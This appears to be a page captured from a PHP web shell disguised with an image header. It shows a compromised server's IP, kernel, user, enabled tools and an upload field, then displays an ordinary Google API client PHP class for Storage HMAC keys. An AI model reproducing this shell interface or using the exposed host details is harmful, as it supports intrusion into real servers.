����JFIF��x�x����'
Server IP : 78.140.185.180 / Your IP : 3.137.156.0 Web Server : LiteSpeed System : Linux cpanel13.v.fozzy.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : builderbox ( 1072) PHP Version : 7.3.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/builderbox/www/vendor/google/apiclient-services/src/Storage/Resource/ |
Upload File : |
<?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Service\Storage\Resource; use Google\Service\Storage\HmacKey; use Google\Service\Storage\HmacKeyMetadata; use Google\Service\Storage\HmacKeysMetadata; /** * The "hmacKeys" collection of methods. * Typical usage is: * <code> * $storageService = new Google\Service\Storage(...); * $hmacKeys = $storageService->hmacKeys; * </code> */ class ProjectsHmacKeys extends \Google\Service\Resource { /** * Creates a new HMAC key for the specified service account. (hmacKeys.create) * * @param string $projectId Project ID owning the service account. * @param string $serviceAccountEmail Email address of the service account. * @param array $optParams Optional parameters. * * @opt_param string userProject The project to be billed for this request. * @return HmacKey */ public function create($projectId, $serviceAccountEmail, $optParams = []) { $params = ['projectId' => $projectId, 'serviceAccountEmail' => $serviceAccountEmail]; $params = array_merge($params, $optParams); return $this->call('create', [$params], HmacKey::class); } /** * Deletes an HMAC key. (hmacKeys.delete) * * @param string $projectId Project ID owning the requested key * @param string $accessId Name of the HMAC key to be deleted. * @param array $optParams Optional parameters. * * @opt_param string userProject The project to be billed for this request. */ public function delete($projectId, $accessId, $optParams = []) { $params = ['projectId' => $projectId, 'accessId' => $accessId]; $params = array_merge($params, $optParams); return $this->call('delete', [$params]); } /** * Retrieves an HMAC key's metadata (hmacKeys.get) * * @param string $projectId Project ID owning the service account of the * requested key. * @param string $accessId Name of the HMAC key. * @param array $optParams Optional parameters. * * @opt_param string userProject The project to be billed for this request. * @return HmacKeyMetadata */ public function get($projectId, $accessId, $optParams = []) { $params = ['projectId' => $projectId, 'accessId' => $accessId]; $params = array_merge($params, $optParams); return $this->call('get', [$params], HmacKeyMetadata::class); } /** * Retrieves a list of HMAC keys matching the criteria. * (hmacKeys.listProjectsHmacKeys) * * @param string $projectId Name of the project in which to look for HMAC keys. * @param array $optParams Optional parameters. * * @opt_param string maxResults Maximum number of items to return in a single * page of responses. The service uses this parameter or 250 items, whichever is * smaller. The max number of items per page will also be limited by the number * of distinct service accounts in the response. If the number of service * accounts in a single response is too high, the page will truncated and a next * page token will be returned. * @opt_param string pageToken A previously-returned page token representing * part of the larger set of results to view. * @opt_param string serviceAccountEmail If present, only keys for the given * service account are returned. * @opt_param bool showDeletedKeys Whether or not to show keys in the DELETED * state. * @opt_param string userProject The project to be billed for this request. * @return HmacKeysMetadata */ public function listProjectsHmacKeys($projectId, $optParams = []) { $params = ['projectId' => $projectId]; $params = array_merge($params, $optParams); return $this->call('list', [$params], HmacKeysMetadata::class); } /** * Updates the state of an HMAC key. See the HMAC Key resource descriptor for * valid states. (hmacKeys.update) * * @param string $projectId Project ID owning the service account of the updated * key. * @param string $accessId Name of the HMAC key being updated. * @param HmacKeyMetadata $postBody * @param array $optParams Optional parameters. * * @opt_param string userProject The project to be billed for this request. * @return HmacKeyMetadata */ public function update($projectId, $accessId, HmacKeyMetadata $postBody, $optParams = []) { $params = ['projectId' => $projectId, 'accessId' => $accessId, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('update', [$params], HmacKeyMetadata::class); } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(ProjectsHmacKeys::class, 'Google_Service_Storage_Resource_ProjectsHmacKeys');